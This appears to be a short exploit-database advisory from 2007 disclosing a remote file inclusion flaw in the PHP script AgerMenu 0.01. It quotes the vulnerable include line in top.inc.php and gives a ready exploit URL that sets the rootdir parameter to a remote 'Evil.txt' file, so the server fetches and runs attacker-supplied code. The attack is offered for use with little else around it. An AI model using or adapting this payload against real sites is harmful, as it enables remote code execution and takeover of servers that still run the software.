id: 1483
date: 02/07/2007
title: AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability
author: GoLd_M
cves: 

=====================================================================
AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability
=====================================================================



===============================================================
Discovered by GolD_M(Mahmnood_ali) 
===============================================================
V.CODE: In : [path]/example/inc/top.inc.php
include $rootdir."inc/agermenu.func.php";
===============================================================
Exploit: v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
===============================================================




#  0day.today [2023-03-21]  #